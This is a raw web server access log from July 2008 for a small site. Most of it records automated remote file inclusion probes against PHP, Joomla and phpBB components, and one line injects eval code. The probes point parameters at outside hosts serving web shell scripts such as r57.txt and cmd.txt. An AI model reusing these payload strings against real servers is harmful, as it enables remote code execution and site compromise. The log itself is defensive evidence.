217.75.193.70 - - [29/Jul/2008:09:25:32 -0700] "GET /logs/access_080329.log/doceboCms/class/class.dashboard_cms.php?where_framework=http://alohaclubhawaii.com/members/community/plugins/safehtml/poiid.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.246.77.172 - - [29/Jul/2008:09:25:40 -0700] "GET /logs/access.log/index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
212.92.23.89 - - [29/Jul/2008:09:25:55 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.fieldpaoli.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.243.169.10 - - [29/Jul/2008:09:25:55 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.243.169.10 - - [29/Jul/2008:09:25:55 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.152.41.170 - - [29/Jul/2008:09:26:26 -0700] "GET /logs/access.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://shopsb.ru/THIEF/kiss/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.152.41.170 - - [29/Jul/2008:09:26:27 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://shopsb.ru/THIEF/kiss/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.125.143.162 - - [29/Jul/2008:09:26:31 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
190.196.5.189 - - [29/Jul/2008:09:26:37 -0700] "GET /logs/access_080513.log//htmltonuke.php?filnavn=http://www.markus-wecker.de/mambots/search/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.251.162.130 - - [29/Jul/2008:09:26:42 -0700] "GET /logs/access_080207.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.126.46.141 - - [29/Jul/2008:09:26:43 -0700] "GET //lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://growlibear.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
82.146.52.69 - - [29/Jul/2008:09:26:50 -0700] "GET /logs/access_080124.log HTTP/1.1" 200 393216 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
200.251.162.130 - - [29/Jul/2008:09:26:55 -0700] "GET /logs/access_080207.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.236.221.63 - - [29/Jul/2008:09:27:02 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
59.125.211.84 - - [29/Jul/2008:09:27:06 -0700] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.icamotorediciones.es/administrator/popups/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.10.38.130 - - [29/Jul/2008:09:27:10 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://moisidis.gr/siteframe/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.45.177.194 - - [29/Jul/2008:09:27:12 -0700] "GET /logs/contacts.php?cal_dir=add%20this? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
207.45.177.194 - - [29/Jul/2008:09:27:13 -0700] "GET /contacts.php?cal_dir=add%20this? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
62.16.126.2 - - [29/Jul/2008:09:27:14 -0700] "GET /logs/access_080114.log HTTP/1.1" 200 393216 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
222.236.221.63 - - [29/Jul/2008:09:27:15 -0700] "GET /logs/access_080110.log//skin/zero_vote/error.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
91.193.130.151 - - [29/Jul/2008:09:27:22 -0700] "GET /logs/access_071225.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://grupo.e-sportv.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
91.193.130.151 - - [29/Jul/2008:09:27:22 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://grupo.e-sportv.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
91.193.130.151 - - [29/Jul/2008:09:27:23 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://grupo.e-sportv.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
204.15.10.22 - - [29/Jul/2008:09:27:34 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://dantman.com/.../rid? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
204.15.10.22 - - [29/Jul/2008:09:27:34 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://dantman.com/.../rid? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
132.199.139.171 - - [29/Jul/2008:09:27:34 -0700] "GET /logs/access_080528.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
132.199.139.171 - - [29/Jul/2008:09:27:40 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
132.199.139.171 - - [29/Jul/2008:09:27:44 -0700] "GET /logs/access_080326.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.185.237.20 - - [29/Jul/2008:09:27:48 -0700] "GET //admin.php?cal_dir=http://artworkmarket.com/administrator/components/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
193.178.228.12 - - [29/Jul/2008:09:27:59 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://dantman.com/.../rid? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
193.178.228.12 - - [29/Jul/2008:09:27:59 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://dantman.com/.../rid? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
84.254.157.102 - - [29/Jul/2008:09:28:04 -0700] "GET /logs/access_071230.log HTTP/1.1" 200 231687 "http://search.yahoo.com/search?n=40&ei=UTF-8&va_vt=any&vo_vt=any&ve_vt=any&vp_vt=any&vd=all&vst=0&vf=txt&vm=r&fl=0&p=%40yahoo.com+2008+OR+%22txt%22+OR+update+%22%40yahoo.com%22+-no+-fraud%2Cscam%2Cwebmaster" "Opera/9.27 (Windows NT 6.0; U; en)" "www.dmulk.com"
200.99.76.3 - - [29/Jul/2008:09:28:20 -0700] "GET /logs/access.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.99.76.3 - - [29/Jul/2008:09:28:21 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.99.76.3 - - [29/Jul/2008:09:28:21 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.113.205.242 - - [29/Jul/2008:09:28:21 -0700] "GET /logs/access_080130.log HTTP/1.0" 200 327680 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
85.227.144.61 - - [29/Jul/2008:09:28:27 -0700] "GET /logs/access_080130.log HTTP/1.1" 200 393216 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
62.169.0.50 - - [29/Jul/2008:09:28:34 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.spanishvida.com//admin/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
62.169.0.50 - - [29/Jul/2008:09:28:34 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.spanishvida.com//admin/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
193.178.228.12 - - [29/Jul/2008:09:28:36 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://dantman.com/.../rid? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
193.178.228.12 - - [29/Jul/2008:09:28:36 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://dantman.com/.../rid? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
67.192.77.37 - - [29/Jul/2008:09:28:36 -0700] "GET /logs/access_080303.log//admin.php?cal_dir=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.192.77.37 - - [29/Jul/2008:09:28:36 -0700] "GET //admin.php?cal_dir=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.192.77.37 - - [29/Jul/2008:09:28:37 -0700] "GET /logs//admin.php?cal_dir=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.254.157.102 - - [29/Jul/2008:09:28:44 -0700] "GET /logs/access_071219.log HTTP/1.1" 200 181961 "http://search.yahoo.com/search?n=40&ei=UTF-8&va_vt=any&vo_vt=any&ve_vt=any&vp_vt=any&vd=all&vst=0&vf=txt&vm=r&fl=0&p=%40yahoo.com+2008+OR+%22txt%22+OR+update+%22%40yahoo.com%22+-no+-fraud%2Cscam%2Cwebmaster" "Opera/9.27 (Windows NT 6.0; U; en)" "www.dmulk.com"
66.225.213.252 - - [29/Jul/2008:09:28:51 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://star.jbsc.ac.kr/technote/config/menu/id.txt?? HTTP/1.1" 200 3694 "-" "libwww-perl/5.810" "www.dmulk.com"
67.212.179.114 - - [29/Jul/2008:09:29:14 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.mazcotaz.com/help/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
216.14.123.10 - - [29/Jul/2008:09:29:18 -0700] "GET /logs//admin.php?cal_dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.14.123.10 - - [29/Jul/2008:09:29:18 -0700] "GET //admin.php?cal_dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
190.196.2.205 - - [29/Jul/2008:09:29:20 -0700] "GET /logs/access_080207.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.221.63 - - [29/Jul/2008:09:29:21 -0700] "GET /logs/access_080129.log//skin/zero_vote/errors.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
222.236.221.63 - - [29/Jul/2008:09:29:24 -0700] "GET /logs/access_080110.log//skin/zero_vote/errors.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.192.77.37 - - [29/Jul/2008:09:29:43 -0700] "GET /logs/access_080208.log//admin.php?cal_dir=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.218.250.106 - - [29/Jul/2008:09:29:58 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 200 18413 "-" "libwww-perl/5.811" "www.dmulk.com"
66.249.70.134 - - [29/Jul/2008:09:30:03 -0700] "GET /blog/index.php/feed/?show=gallery&nggpage=2 HTTP/1.1" 304 1 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "dmulk.com"
83.102.137.163 - - [29/Jul/2008:09:30:05 -0700] "GET /logs/doceboCms/class/class.dashboard_cms.php?where_framework=http://alohaclubhawaii.com/members/community/plugins/safehtml/poiid.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.102.137.163 - - [29/Jul/2008:09:30:05 -0700] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://alohaclubhawaii.com/members/community/plugins/safehtml/poiid.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.102.137.163 - - [29/Jul/2008:09:30:05 -0700] "GET /logs/access_080313.log/doceboCms/class/class.dashboard_cms.php?where_framework=http://alohaclubhawaii.com/members/community/plugins/safehtml/poiid.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.45.177.194 - - [29/Jul/2008:09:30:11 -0700] "GET /logs/contacts.php?cal_dir=http://artworkmarket.com/administrator/components/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
207.45.177.194 - - [29/Jul/2008:09:30:11 -0700] "GET /contacts.php?cal_dir=http://artworkmarket.com/administrator/components/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
83.102.137.163 - - [29/Jul/2008:09:30:15 -0700] "GET /logs/access_080329.log/doceboCms/class/class.dashboard_cms.php?where_framework=http://alohaclubhawaii.com/members/community/plugins/safehtml/poiid.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.236.221.63 - - [29/Jul/2008:09:30:16 -0700] "GET /logs/access_080129.log//skin/zero_vote/errors.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
222.236.221.63 - - [29/Jul/2008:09:30:19 -0700] "GET /logs/access_080110.log//skin/zero_vote/errors.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.17.183 - - [29/Jul/2008:09:30:31 -0700] "GET /logs/access_080226.log HTTP/1.0" 200 196608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
190.196.2.205 - - [29/Jul/2008:09:30:36 -0700] "GET /logs/access_080315.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:09:30:37 -0700] "GET /logs/access_080315.log/errors.php?error=http://www.freewebtown.com/cupu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
190.196.2.205 - - [29/Jul/2008:09:30:38 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.196.2.205 - - [29/Jul/2008:09:30:41 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.97.0.11 - - [29/Jul/2008:09:30:44 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.67.119 - - [29/Jul/2008:09:30:44 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 200 18413 "-" "libwww-perl/5.812" "www.dmulk.com"
65.55.213.30 - - [29/Jul/2008:09:30:45 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.213.30 - - [29/Jul/2008:09:30:48 -0700] "GET /logs/access_080315.log HTTP/1.0" 200 1534505 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
216.246.77.172 - - [29/Jul/2008:09:30:49 -0700] "GET /index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 200 3694 "-" "libwww-perl/5.810" "www.dmulk.com"
72.243.169.10 - - [29/Jul/2008:09:30:52 -0700] "GET /logs/access_080330.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.14.123.10 - - [29/Jul/2008:09:30:55 -0700] "GET /logs/contacts.php?cal_dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.14.123.10 - - [29/Jul/2008:09:30:55 -0700] "GET /contacts.php?cal_dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
75.66.49.165 - - [29/Jul/2008:09:30:55 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0139_0.jpg HTTP/1.1" 200 344118 "http://www.vfrdiscussion.com/forum/index.php?showtopic=36984" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "dmulk.com"
91.193.130.151 - - [29/Jul/2008:09:31:17 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://grupo.e-sportv.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.97.0.11 - - [29/Jul/2008:09:31:18 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.97.0.11 - - [29/Jul/2008:09:31:18 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.99.76.3 - - [29/Jul/2008:09:31:31 -0700] "GET /logs/access.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.99.76.3 - - [29/Jul/2008:09:31:32 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.99.76.3 - - [29/Jul/2008:09:31:32 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.218.250.106 - - [29/Jul/2008:09:31:35 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.218.85.18 - - [29/Jul/2008:09:32:14 -0700] "GET /logs//popup_window.php?site_isp_root=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:09:32:14 -0700] "GET /logs/access_080207.log/errors.php?error=http://www.freewebtown.com/cupu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.218.85.18 - - [29/Jul/2008:09:32:14 -0700] "GET //popup_window.php?site_isp_root=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.234.119.86 - - [29/Jul/2008:09:32:25 -0700] "GET /logs/access.log//include/write.php?dir=http://russianinterpreter.ru/images/stories/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.234.119.86 - - [29/Jul/2008:09:32:25 -0700] "GET //include/write.php?dir=http://russianinterpreter.ru/images/stories/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.234.119.86 - - [29/Jul/2008:09:32:25 -0700] "GET /logs//include/write.php?dir=http://russianinterpreter.ru/images/stories/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.70.36.107 - - [29/Jul/2008:09:32:54 -0700] "GET /logs/access.log//join.php?DOCUMENT_ROOT=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.70.36.107 - - [29/Jul/2008:09:32:54 -0700] "GET //join.php?DOCUMENT_ROOT=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.70.36.107 - - [29/Jul/2008:09:32:55 -0700] "GET /logs//join.php?DOCUMENT_ROOT=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.230.35.101 - - [29/Jul/2008:09:32:59 -0700] "GET /logs/access_080528.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.243.169.10 - - [29/Jul/2008:09:33:00 -0700] "GET /logs/access.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.243.169.10 - - [29/Jul/2008:09:33:00 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.243.169.10 - - [29/Jul/2008:09:33:00 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.230.35.101 - - [29/Jul/2008:09:33:01 -0700] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 200 18597 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.35.101 - - [29/Jul/2008:09:33:02 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.243.169.10 - - [29/Jul/2008:09:33:02 -0700] "GET /logs/access.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.243.169.10 - - [29/Jul/2008:09:33:03 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.243.169.10 - - [29/Jul/2008:09:33:03 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.45.177.194 - - [29/Jul/2008:09:33:35 -0700] "GET //admin.php?cal_dir=http://artworkmarket.com/administrator/components/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
200.35.33.82 - - [29/Jul/2008:09:33:45 -0700] "GET /logs/errors.php?error=http://www.dennisw.idv.tw:8080/xoops/modules/agendax/mc??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.35.33.82 - - [29/Jul/2008:09:33:45 -0700] "GET /errors.php?error=http://www.dennisw.idv.tw:8080/xoops/modules/agendax/mc??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.230.35.101 - - [29/Jul/2008:09:33:54 -0700] "GET /logs/access_080327.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.51.219.170 - - [29/Jul/2008:09:33:56 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://shra.net/rar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.51.219.170 - - [29/Jul/2008:09:33:56 -0700] "GET /logs/access.log//components/com_flyspray/startdown.php?file=http://shra.net/rar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.51.219.170 - - [29/Jul/2008:09:33:56 -0700] "GET //components/com_flyspray/startdown.php?file=http://shra.net/rar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.150.247.23 - - [29/Jul/2008:09:34:03 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 200 18413 "-" "libwww-perl/5.811" "www.dmulk.com"
